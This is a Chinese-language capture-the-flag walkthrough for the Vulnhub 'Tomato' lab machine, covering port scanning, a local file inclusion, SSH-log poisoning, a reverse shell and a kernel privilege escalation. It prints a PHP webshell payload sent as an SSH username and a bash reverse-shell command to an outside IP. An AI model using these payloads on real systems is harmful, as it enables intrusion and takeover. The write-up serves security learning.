枚举

确定 IP 地址

使用 nmap 进行探活：

1
2
3
4


nmap -sn 10.1.1.0/24

Nmap scan report for 10.1.1.69
Host is up (0.00089s latency).

机器 IP 为 10.1.1.69。

端口扫描及服务枚举

进行全 TCP 端口扫描，同时枚举服务和操作系统的信息：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.1.1.69

PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 63 vsftpd 3.0.3
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDWlaPDFzZw57482HON5cSi7r32bM0suv/W/UDSY5vhwZVUE3f2uWmYsxXWrZTDRjKkzEay90N+X7d22SOGuMLhUNSowjsciLzEwymx2pnj3brhQvXOmzMNl9+QmJl0nJ2OrIJ946Rz1zTTh208gj0tFKK8PmAtrHVKithkKDFiW3yt9IM41X/ECjn7rG3rFsz3IB0x5vMEpkFennAfLL3odCCeb49wDXOpmZ9tiadpBmqKdgQr3NSRZ82lTgLGism9iWK5gUDdw/2PCBYQcL8eYRJxkYKhqcGJ4h8ieMjn0L+EpEleA3y7qQtClhZ9LFeaKhOoUe6fjFszqBZwMCqp
|   256 b3:12:60:32:48:28:eb:ac:80🇩🇪17:d7:96:77:6e:2f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPTQBx5f7oumXmo4oI/1UcCQcbsuDeltX8HhjGszH52b43ALRnIolE7tp2lL3RRcDPYFCP6TYiFTiI5BTItFxjM=
|   256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO+ijwjZgKJrKtJ1LCS0tHecORlikMHQY36bDmZ7fX9Y
8888/tcp open  http    syn-ack ttl 63 nginx 1.10.3 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1

仅仅开放了三个端口———— 21、80、2211 和 8888，分别运行着 ftp、apache、openssh 和 nginx。

20 个常用 UDP 端口扫描:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


nmap -vv --reason -Pn -sU -A --top-ports=20 --version-all 10.1.1.69

PORT      STATE         SERVICE      REASON              VERSION
53/udp    closed        domain       port-unreach ttl 63
67/udp    closed        dhcps        port-unreach ttl 63
68/udp    open|filtered dhcpc        no-response
69/udp    open|filtered tftp         no-response
123/udp   open|filtered ntp          no-response
135/udp   closed        msrpc        port-unreach ttl 63
137/udp   closed        netbios-ns   port-unreach ttl 63
138/udp   closed        netbios-dgm  port-unreach ttl 63
139/udp   open|filtered netbios-ssn  no-response
161/udp   closed        snmp         port-unreach ttl 63
162/udp   closed        snmptrap     port-unreach ttl 63
445/udp   closed        microsoft-ds port-unreach ttl 63
500/udp   open|filtered isakmp       no-response
514/udp   closed        syslog       port-unreach ttl 63
520/udp   closed        route        port-unreach ttl 63
631/udp   closed        ipp          port-unreach ttl 63
1434/udp  open|filtered ms-sql-m     no-response
1900/udp  closed        upnp         port-unreach ttl 63
4500/udp  open|filtered nat-t-ike    no-response
49152/udp closed        unknown      port-unreach ttl 63

21 端口枚举

并不能 anonymous 登录，除此之外再无发现。

80 端口枚举

主页仅仅为一张图片,图片并未发现异常:

tomato

使用 dirb 进行目录扫描:

1
2
3
4
5
6
7
8


dirb http://10.1.1.69

---- Scanning URL: http://10.1.1.69/ ----
==> DIRECTORY: http://10.1.1.69/antibot_image/
+ http://10.1.1.69/index.html (CODE:200|SIZE:652)
+ http://10.1.1.69/server-status (CODE:403|SIZE:274)

---- Entering directory: http://10.1.1.69/antibot_image/ ----

发现可读目录 /antibot_image：

antibots

其中的 info.php 中有一句 include，怀疑可包含本地文件：

info

读取 /etc/passwd，但并不能 RFI：

passwd

8888 端口

需要认证，并不知道密码：

8888

Initial Shell

尝试通过日志投毒利用 LFI 来 get shell。经过尝试，发现 /var/log/auth.log 可以读取：

auth_log

SSH 登录使用一句话作为用户名，投毒日志：

1

ssh '<?php system($_GET["cmd"]); ?>'@10.1.1.69

尝试执行 id 命令，成功：

运行 bash reverse payload，成功反弹 shell：

1

http://10.1.1.69/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=exec bash -c "bash -i >/dev/tcp/192.168.17.48/8080 0>&1"

rev

获取到 Initial Shell。

提权

使用 linpeas 进行枚举，发现了 nginx 的 hash，经过简单的破解并无结果，转而转向内核：

1
2
3
4
5
6
7


[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

搜索 exploit：

Exploit Title	Path
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation	solaris/local/15962.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - ‘Sendpage’ Local Privilege Escalation (Metasploit)	linux/local/19933.rb
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - ‘sock_sendpage()’ Ring0 Privilege Escalation (5)	linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ‘ip_append_data()’ Ring0 Privilege Escalation (1)	linux_x86/local/9542.c
Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption	linux/dos/39545.txt
Linux Kernel 3.11 < 4.8 0 - ‘SO_SNDBUFFORCE’ / ‘SO_RCVBUFFORCE’ Local Privilege Escalation	linux/local/41995.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free	linux/dos/43234.c
Linux Kernel 4.4 (Ubuntu 16.04) - ‘BPF’ Local Privilege Escalation (Metasploit)	linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - ‘snd_timer_user_ccallback()’ Kernel Pointer Leak	linux/dos/46529.c
Linux Kernel 4.4 - ‘rtnetlink’ Stack Memory Disclosure	linux/local/46006.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - ‘AF_PACKET’ Race Condition Privilege Escalation	linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)	linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation	linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter ‘target_offset’ Out-of-Bounds Privilege Escalation	linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - ‘AF_PACKET’ Race Condition Privilege Escalation	windows_x86-64/local/47170.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)	linux/local/39277.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)	linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ bpf(BPF_PROG_LOAD) Privilege Escalation	linux/local/39772.txt
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation	linux/local/41886.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation	arm/local/31574.c
Linux Kernel < 4.10.13 - ‘keyctl_set_reqkey_keyring’ Local Denial of Service	linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation	linux/local/43345.c
Linux Kernel < 4.11.8 - ‘mq_notify: double sock_put()’ Local Privilege Escalation	linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)	linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation	linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service	linux/dos/42932.c
Linux Kernel < 4.15.4 - ‘show_floppy’ KASLR Address Leak	linux/local/44325.c
Linux Kernel < 4.16.11 - ‘ext4_read_inline_data()’ Memory Corruption	linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - ‘AF_LLC’ Double Free	linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation	linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - ‘netfilter target_offset’ Local Privilege Escalation	linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)	linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)	linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)	linux/dos/44301.c

机器上没有 gcc，只能将编译后的 exploit 上传至机器，经过一番尝试最终选择 45010。运行，获得 root 权限：

root

Vulnhub Tomato

文章目录

枚举